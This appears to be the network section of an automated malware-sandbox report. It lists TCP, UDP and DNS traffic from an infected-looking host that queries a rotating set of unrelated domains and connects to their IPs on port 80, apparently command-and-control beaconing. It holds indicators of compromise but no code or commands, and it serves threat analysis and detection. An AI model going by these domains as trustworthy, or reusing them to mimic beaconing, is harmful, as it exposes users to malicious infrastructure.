                                          Aug 30, 2024 09:40:51.471864939 CEST4974880192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:52.486552954 CEST4974980192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:52.491600990 CEST804974985.159.66.93192.168.2.4
                                          Aug 30, 2024 09:40:52.494699001 CEST4974980192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:52.498574018 CEST4974980192.168.2.485.159.66.93
                                          Aug 30, 2024 09:40:52.503396988 CEST804974985.159.66.93192.168.2.4
                                          Aug 30, 2024 09:41:53.215025902 CEST804974985.159.66.93192.168.2.4
                                          Aug 30, 2024 09:41:53.215059996 CEST804974985.159.66.93192.168.2.4
                                          Aug 30, 2024 09:41:53.215209961 CEST4974980192.168.2.485.159.66.93
                                          Aug 30, 2024 09:41:53.218342066 CEST4974980192.168.2.485.159.66.93
                                          Aug 30, 2024 09:41:53.223165035 CEST804974985.159.66.93192.168.2.4
                                          Aug 30, 2024 09:41:58.253070116 CEST4975080192.168.2.491.195.240.94
                                          Aug 30, 2024 09:41:58.257878065 CEST804975091.195.240.94192.168.2.4
                                          Aug 30, 2024 09:41:58.258852005 CEST4975080192.168.2.491.195.240.94
                                          Aug 30, 2024 09:41:58.262658119 CEST4975080192.168.2.491.195.240.94
                                          Aug 30, 2024 09:41:58.267430067 CEST804975091.195.240.94192.168.2.4
                                          Aug 30, 2024 09:41:58.895519018 CEST804975091.195.240.94192.168.2.4
                                          Aug 30, 2024 09:41:58.895633936 CEST804975091.195.240.94192.168.2.4
                                          Aug 30, 2024 09:41:58.895680904 CEST4975080192.168.2.491.195.240.94
                                          Aug 30, 2024 09:41:59.766655922 CEST4975080192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:00.787365913 CEST4975180192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:00.792293072 CEST804975191.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:00.792368889 CEST4975180192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:00.795259953 CEST4975180192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:00.800177097 CEST804975191.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:02.036525011 CEST804975191.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:02.036607027 CEST804975191.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:02.036617994 CEST804975191.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:02.036693096 CEST4975180192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:02.036832094 CEST804975191.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:02.038009882 CEST4975180192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:02.310657024 CEST4975180192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:03.329962969 CEST4975280192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:03.334918022 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.335012913 CEST4975280192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:03.337584019 CEST4975280192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:03.342457056 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342499018 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342509985 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342519999 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342607021 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342617989 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342684031 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342705011 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.342714071 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:03.974976063 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:04.028992891 CEST4975280192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:04.072268963 CEST804975291.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:04.072444916 CEST4975280192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:04.841720104 CEST4975280192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:05.861238003 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:05.866023064 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:05.869805098 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:05.874682903 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:05.879465103 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562836885 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562870979 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562885046 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562896967 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562908888 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562920094 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562931061 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562942982 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562952995 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562959909 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.562958002 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.563138008 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.567924976 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.567938089 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.567950010 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.568064928 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.660123110 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660144091 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660152912 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660164118 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660288095 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.660363913 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660376072 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660386086 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660427094 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.660444021 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660455942 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.660478115 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.661040068 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.661079884 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.661097050 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.661339998 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:06.661382914 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.665832996 CEST4975380192.168.2.491.195.240.94
                                          Aug 30, 2024 09:42:06.670675993 CEST804975391.195.240.94192.168.2.4
                                          Aug 30, 2024 09:42:11.901118994 CEST4975480192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:11.905957937 CEST804975415.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:11.906795025 CEST4975480192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:11.910706043 CEST4975480192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:11.915501118 CEST804975415.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:12.363284111 CEST804975415.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:12.363373041 CEST4975480192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:13.419722080 CEST4975480192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:13.424624920 CEST804975415.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:14.438460112 CEST4975580192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:14.443507910 CEST804975515.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:14.443675041 CEST4975580192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:14.445593119 CEST4975580192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:14.450404882 CEST804975515.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:14.900635004 CEST804975515.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:14.900693893 CEST4975580192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:15.950948000 CEST4975580192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:15.955884933 CEST804975515.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.971090078 CEST4975680192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:16.976352930 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.976465940 CEST4975680192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:16.979105949 CEST4975680192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:16.984129906 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984147072 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984155893 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984164953 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984235048 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984245062 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984400988 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984411001 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:16.984420061 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:17.440663099 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:17.440784931 CEST4975680192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:18.482687950 CEST4975680192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:18.487692118 CEST804975615.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:19.508277893 CEST4975780192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:19.515368938 CEST804975715.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:19.515438080 CEST4975780192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:19.518649101 CEST4975780192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:19.523667097 CEST804975715.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:19.974818945 CEST804975715.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:19.974842072 CEST804975715.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:19.982608080 CEST4975780192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:19.998692989 CEST4975780192.168.2.415.197.212.58
                                          Aug 30, 2024 09:42:20.004319906 CEST804975715.197.212.58192.168.2.4
                                          Aug 30, 2024 09:42:25.144905090 CEST4975880192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:25.149871111 CEST804975866.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:25.150046110 CEST4975880192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:25.290426016 CEST4975880192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:25.295264959 CEST804975866.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:25.788676023 CEST804975866.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:25.788765907 CEST804975866.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:25.790880919 CEST4975880192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:26.794713020 CEST4975880192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:28.002686977 CEST4975980192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:28.007491112 CEST804975966.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:28.010828972 CEST4975980192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:28.014693975 CEST4975980192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:28.019539118 CEST804975966.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:28.599447966 CEST804975966.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:28.599471092 CEST804975966.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:28.599549055 CEST4975980192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:29.529088974 CEST4975980192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:30.550714016 CEST4976080192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:30.555754900 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.558870077 CEST4976080192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:30.562743902 CEST4976080192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:30.567600965 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567615032 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567625999 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567634106 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567637920 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567790985 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567883015 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567892075 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:30.567899942 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:31.150937080 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:31.150964975 CEST804976066.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:31.151031017 CEST4976080192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:32.078576088 CEST4976080192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:33.095464945 CEST4976180192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:33.100358963 CEST804976166.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:33.100446939 CEST4976180192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:33.102448940 CEST4976180192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:33.107256889 CEST804976166.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:33.713421106 CEST804976166.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:33.713788986 CEST804976166.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:33.714030981 CEST4976180192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:33.716938972 CEST4976180192.168.2.466.29.149.46
                                          Aug 30, 2024 09:42:33.721766949 CEST804976166.29.149.46192.168.2.4
                                          Aug 30, 2024 09:42:38.812609911 CEST4976280192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:38.817548990 CEST8049762195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:38.817621946 CEST4976280192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:38.820089102 CEST4976280192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:38.824891090 CEST8049762195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:39.502351046 CEST8049762195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:39.503799915 CEST8049762195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:39.503849030 CEST4976280192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:40.326205015 CEST4976280192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:41.345154047 CEST4976380192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:41.350132942 CEST8049763195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:41.350230932 CEST4976380192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:41.352644920 CEST4976380192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:41.357908010 CEST8049763195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:42.035736084 CEST8049763195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:42.035903931 CEST8049763195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:42.036097050 CEST4976380192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:42.857197046 CEST4976380192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:43.876507044 CEST4976480192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:43.881458044 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.881648064 CEST4976480192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:43.884783030 CEST4976480192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:43.889720917 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889736891 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889755964 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889765024 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889772892 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889786005 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889890909 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889899969 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:43.889909983 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:44.685038090 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:44.685751915 CEST8049764195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:44.685998917 CEST4976480192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:45.388453960 CEST4976480192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:46.407253027 CEST4976580192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:46.412287951 CEST8049765195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:46.414808989 CEST4976580192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:46.418720007 CEST4976580192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:46.423532963 CEST8049765195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:47.109494925 CEST8049765195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:47.109724045 CEST8049765195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:47.109777927 CEST4976580192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:47.113013983 CEST4976580192.168.2.4195.110.124.133
                                          Aug 30, 2024 09:42:47.118772984 CEST8049765195.110.124.133192.168.2.4
                                          Aug 30, 2024 09:42:52.146735907 CEST4976680192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:52.151556015 CEST804976615.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:52.154829979 CEST4976680192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:52.158744097 CEST4976680192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:52.163593054 CEST804976615.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:52.613837957 CEST804976615.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:52.615094900 CEST4976680192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:53.669755936 CEST4976680192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:53.675599098 CEST804976615.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:54.690763950 CEST4976780192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:54.695836067 CEST804976715.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:54.695982933 CEST4976780192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:54.698743105 CEST4976780192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:54.703922987 CEST804976715.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:55.154484987 CEST804976715.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:55.154552937 CEST4976780192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:56.200978041 CEST4976780192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:56.205991983 CEST804976715.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.229124069 CEST4976880192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:57.234008074 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.234091043 CEST4976880192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:57.244179010 CEST4976880192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:57.249052048 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249063969 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249089003 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249098063 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249109030 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249233007 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249242067 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249300003 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.249309063 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.690397024 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:57.690459013 CEST4976880192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:58.763561010 CEST4976880192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:58.768457890 CEST804976815.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:59.849409103 CEST4976980192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:59.854346991 CEST804976915.197.240.20192.168.2.4
                                          Aug 30, 2024 09:42:59.854471922 CEST4976980192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:59.858748913 CEST4976980192.168.2.415.197.240.20
                                          Aug 30, 2024 09:42:59.863790035 CEST804976915.197.240.20192.168.2.4
                                          Aug 30, 2024 09:43:00.311523914 CEST804976915.197.240.20192.168.2.4
                                          Aug 30, 2024 09:43:00.311546087 CEST804976915.197.240.20192.168.2.4
                                          Aug 30, 2024 09:43:00.311784029 CEST4976980192.168.2.415.197.240.20
                                          Aug 30, 2024 09:43:00.314769030 CEST4976980192.168.2.415.197.240.20
                                          Aug 30, 2024 09:43:00.319576025 CEST804976915.197.240.20192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Aug 30, 2024 09:39:48.071932077 CEST5409653192.168.2.41.1.1.1
                                          Aug 30, 2024 09:39:49.060116053 CEST5409653192.168.2.41.1.1.1
                                          Aug 30, 2024 09:39:50.080010891 CEST5409653192.168.2.41.1.1.1
                                          Aug 30, 2024 09:39:50.590090036 CEST53540961.1.1.1192.168.2.4
                                          Aug 30, 2024 09:39:50.590112925 CEST53540961.1.1.1192.168.2.4
                                          Aug 30, 2024 09:39:50.590116978 CEST53540961.1.1.1192.168.2.4
                                          Aug 30, 2024 09:40:06.548651934 CEST6183453192.168.2.41.1.1.1
                                          Aug 30, 2024 09:40:07.544595957 CEST6183453192.168.2.41.1.1.1
                                          Aug 30, 2024 09:40:07.869649887 CEST53618341.1.1.1192.168.2.4
                                          Aug 30, 2024 09:40:07.874109983 CEST53618341.1.1.1192.168.2.4
                                          Aug 30, 2024 09:40:21.720527887 CEST5377653192.168.2.41.1.1.1
                                          Aug 30, 2024 09:40:22.716487885 CEST5377653192.168.2.41.1.1.1
                                          Aug 30, 2024 09:40:22.993104935 CEST53537761.1.1.1192.168.2.4
                                          Aug 30, 2024 09:40:22.993120909 CEST53537761.1.1.1192.168.2.4
                                          Aug 30, 2024 09:40:36.705449104 CEST5419153192.168.2.41.1.1.1
                                          Aug 30, 2024 09:40:36.715199947 CEST53541911.1.1.1192.168.2.4
                                          Aug 30, 2024 09:40:44.782681942 CEST6345053192.168.2.41.1.1.1
                                          Aug 30, 2024 09:40:44.880317926 CEST53634501.1.1.1192.168.2.4
                                          Aug 30, 2024 09:41:58.235791922 CEST5261453192.168.2.41.1.1.1
                                          Aug 30, 2024 09:41:58.250551939 CEST53526141.1.1.1192.168.2.4
                                          Aug 30, 2024 09:42:11.674673080 CEST5264453192.168.2.41.1.1.1
                                          Aug 30, 2024 09:42:11.895972967 CEST53526441.1.1.1192.168.2.4
                                          Aug 30, 2024 09:42:25.084542990 CEST5424553192.168.2.41.1.1.1
                                          Aug 30, 2024 09:42:25.111083031 CEST53542451.1.1.1192.168.2.4
                                          Aug 30, 2024 09:42:38.736509085 CEST6038253192.168.2.41.1.1.1
                                          Aug 30, 2024 09:42:38.809495926 CEST53603821.1.1.1192.168.2.4
                                          Aug 30, 2024 09:42:52.126764059 CEST5048353192.168.2.41.1.1.1
                                          Aug 30, 2024 09:42:52.139580011 CEST53504831.1.1.1192.168.2.4
                                          Aug 30, 2024 09:43:05.330440998 CEST6063853192.168.2.41.1.1.1
                                          Aug 30, 2024 09:43:05.421667099 CEST53606381.1.1.1192.168.2.4
                                          Aug 30, 2024 09:43:13.876252890 CEST6002153192.168.2.41.1.1.1
                                          Aug 30, 2024 09:43:13.931818008 CEST53600211.1.1.1192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Aug 30, 2024 09:39:48.071932077 CEST192.168.2.41.1.1.10x6b2bStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:39:49.060116053 CEST192.168.2.41.1.1.10x6b2bStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:39:50.080010891 CEST192.168.2.41.1.1.10x6b2bStandard query (0)www.3xfootball.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:06.548651934 CEST192.168.2.41.1.1.10x26e9Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:07.544595957 CEST192.168.2.41.1.1.10x26e9Standard query (0)www.kasegitai.tokyoA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:21.720527887 CEST192.168.2.41.1.1.10x2da4Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:22.716487885 CEST192.168.2.41.1.1.10x2da4Standard query (0)www.goldenjade-travel.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:36.705449104 CEST192.168.2.41.1.1.10x885cStandard query (0)www.antonio-vivaldi.mobiA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:44.782681942 CEST192.168.2.41.1.1.10x3407Standard query (0)www.magmadokum.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:41:58.235791922 CEST192.168.2.41.1.1.10x6dabStandard query (0)www.rssnewscast.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:11.674673080 CEST192.168.2.41.1.1.10xda93Standard query (0)www.liangyuen528.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:25.084542990 CEST192.168.2.41.1.1.10x10b5Standard query (0)www.techchains.infoA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:38.736509085 CEST192.168.2.41.1.1.10x5f2eStandard query (0)www.elettrosistemista.zipA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:42:52.126764059 CEST192.168.2.41.1.1.10xd895Standard query (0)www.donnavariedades.comA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:43:05.330440998 CEST192.168.2.41.1.1.10x1431Standard query (0)www.660danm.topA (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:43:13.876252890 CEST192.168.2.41.1.1.10x5736Standard query (0)www.empowermedeco.comA (IP address)IN (0x0001)false

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Aug 30, 2024 09:39:50.590090036 CEST1.1.1.1192.168.2.40x6b2bNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:39:50.590112925 CEST1.1.1.1192.168.2.40x6b2bNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:39:50.590116978 CEST1.1.1.1192.168.2.40x6b2bNo error (0)www.3xfootball.com154.215.72.110A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:07.869649887 CEST1.1.1.1192.168.2.40x26e9No error (0)www.kasegitai.tokyo54.65.172.3A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:07.874109983 CEST1.1.1.1192.168.2.40x26e9No error (0)www.kasegitai.tokyo54.65.172.3A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:22.993104935 CEST1.1.1.1192.168.2.40x2da4No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
                                          Aug 30, 2024 09:40:22.993120909 CEST1.1.1.1192.168.2.40x2da4No error (0)www.goldenjade-travel.com116.50.37.244A (IP address)IN (0x0001)false
